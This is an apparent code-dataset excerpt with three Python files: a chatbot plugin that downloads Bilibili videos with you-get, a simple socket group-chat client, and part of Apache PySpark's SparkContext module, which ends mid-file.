source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
youget.py
|
from core.bots._base import Bot
from core.state import State
from _global import regex
from _global.const import _Score
from _global.mission import Mission
import os
import time
import subprocess
class YouGetBiliBili(Bot):
def __init__(self, pool):
super(YouGetBiliBili, self).__init__()
self.pool = pool
self.download_dict = {} # 表示号对应子进程号 格式两位数字 #dd
self.download_name_dict = {} # 表示号对应title 格式两位数字 #dd
self.url = None
self.act = False
self.act_message = ""
def match(self, query, st):
self.url = regex.url2.search(query)
# 目前只考虑BiliBili
return any([self.url is not None and "bilibili" in self.url[0],
"youget" in query,
"you_get" in query,
"you-get" in query,
"YOUGET" in query]), _Score.LevelNormal
def helper(self):
return ["给我一个B站视频的链接我能直接下载噢"]
def activate_match(self, query, st: State):
return self.act
def activate_say(self, query, st):
self.act = False
return self.act_message
def get_response(self, query, st: State):
user_id = st.user_id
self.url = regex.url2.search(query)
if "取消" in query or "#" in query:
if query.startswith("#"):
# 回答即id
id = query
else:
id = regex.youget_number.search(query) # 进程标识
if id is not None:
id = id[0]
if id is None or id not in self.download_dict:
ans = "没有找到合适的id。\n" if id is None else "没有找到{}。\n".format(id)
ans += "你需要取消下载哪一个?\n\n"
for id, title in self.download_name_dict.items():
ans += "- [{id}]:{title}\n".format(id=id, title=title)
else:
pro = self.download_dict[id]
pro.terminate()
del self.download_dict[id]
del self.download_name_dict[id]
ans = "已经取消啦"
return ans
elif self.url is not None:
# 先去掉中文等杂音
url = regex.alpah_number_sym.sub("", self.url[0])
# 先抽取标题
# cmd = "you-get {url} --json".format(url=url)
# p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = p.stdout.read()
#
# parsed_json = json.loads(out.decode())
title = url # parsed_json["title"]
def func():
try:
out_stream = open("./UserData/tmp/youget_output.txt", "w")
dir_ = os.path.join("./UserData/{}".format(user_id), "video")
if not os.path.exists(dir_):
os.makedirs(dir_)
output_dir = os.path.join(dir_, str(int(time.time())))
cmd = "you-get {url} --output-dir {output} -a -l".format(url=url,
output=output_dir)
id = "#{}".format(len(self.download_dict))
self.download_name_dict[id] = title
self.download_dict[id] = subprocess.Popen(cmd.split(" "),
shell=False, stdout=out_stream,
stderr=subprocess.PIPE)
self.download_dict[id].wait()
out_stream.close()
# 下载完成/错误/主动取消都会跳出wait,检测是否要主动提醒
if id in self.download_dict:
# 如果主动取消就不会存在dict里了
error_info = self.download_dict[id].stderr.read()
if len(error_info) == 0:
self.act = True
self.act_message = "{}下载完成咯。保存在{}".format(title, output_dir)
else:
self.act = True
self.act_message = "下载出问题了。\n问题报告:{}".format(error_info)
del self.download_dict[id]
del self.download_name_dict[id]
except Exception as e:
raise e
# t = Thread(target=func)
# t.setDaemon(True)
# t.start()
mission = Mission(name="you-get: {}".format(url), func=func)
self.pool.add_mission(mission)
ans = "我在用you-get下载{}了哦。\n视频名字叫:{}".format(url, title)
self.url = None
return ans
|
socket-client.py
|
import socket as Socket
from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread
import time
class Client:
def __init__(self):
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.name = str(Socket.gethostbyname(Socket.gethostname()))
self.receive_thread = None
self.server_port = 9876
self.server_host = ''
self.groupchat_port = 0
self.main()
def main(self):
self.server_host = input('Enter ip: ').strip()
while True:
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect((self.server_host, self.server_port))
while True:
msg = input().strip()
if msg == '/setname':
self.name = input().strip()
elif msg == '/newgroup':
valid = False
while not valid:
self.client_socket.send(bytes('/newgroup', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
valid = bool(self.client_socket.recv(1024).decode('utf8'))
elif msg == '/connect':
self.client_socket.send(bytes('/getgroup', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.groupchat_port = int(self.client_socket.recv(1024).decode('utf8'))
self.client_socket.close()
break
elif msg == '/delete':
self.client_socket.send(bytes('/delete', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
else:
print('Unknown command!')
if self.groupchat_port == -1:
print('Group not found!')
continue
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect((self.server_host, self.groupchat_port))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
if self.client_socket.recv(1024).decode('utf8') == '0':
print('Wrong password!')
self.client_socket.close()
continue
self.receive_thread = Thread(target=self.receive)
self.receive_thread.start()
while True:
msg = input().strip()
if msg == '/setname':
self.name = input().strip()
elif msg == '/quit':
self.client_socket.close()
print('Disconnected')
break
elif msg == '/data':
file = open('Test.txt','r')
fileData = file.read(1024)
self.client_socket.send(fileData, 'utf8')
else:
self.client_socket.send(bytes(f'{self.name}: {msg}', 'utf8'))
def send(self, msg):
self.client_socket.send(bytes(msg, 'utf8'))
def receive(self):
while True:
try:
msg = self.client_socket.recv(1024).decode('utf8')
print(msg)
except OSError:
break
if __name__ == '__main__':
client = Client()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import signal
import sys
import threading
import warnings
import importlib
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from py4j.java_gateway import is_instance_of
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.resource.information import ResourceInformation
from pyspark.rdd import RDD, _load_from_socket
from pyspark.taskcontext import TaskContext
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create :class:`RDD` and
broadcast variables on that cluster.
.. note:: Only one :class:`SparkContext` should be active per JVM. You must `stop()`
the active :class:`SparkContext` before creating a new one.
.. note:: :class:`SparkContext` instance is not supported to share across multiple
processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purpose.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through `conf`.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A :class:`SparkConf` object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
if (conf is None or
conf.get("spark.executor.allowSparkContext", "false").lower() != "true"):
# In order to prevent SparkContext from being created in executors.
SparkContext._assert_on_driver()
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" is not allowed as it is a security risk.")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.isEncryptionEnabled(self._jsc)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(range(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using range
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(range(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, range):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
# it's an empty iterator here but we need this line for triggering the
# logic of signal handling in FramedSerializer.load_stream, for instance,
# SpecialLengths.END_OF_DATA_SECTION in _read_with_length. Since
# FramedSerializer.load_stream produces a generator, the control should
# at least be in that function once. Here we do it by explicitly converting
# the empty iterator to a list, thus make sure worker reuse takes effect.
# See more details in SPARK-26549.
assert len(list(iterator)) == 0
return range(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
:param data:
:param serializer:
:param reader_func: A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
:param createRDDServer: A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
:return:
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
# we eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using :meth:`RDD.saveAsPickleFile` method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files:
.. code-block:: text
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do ``rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")``,
then ``rdd`` contains:
.. code-block:: text
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[('.../1.txt', '1'), ('.../2.txt', '2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. :class:`PickleSerializer` is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
def union(self, rdds):
"""
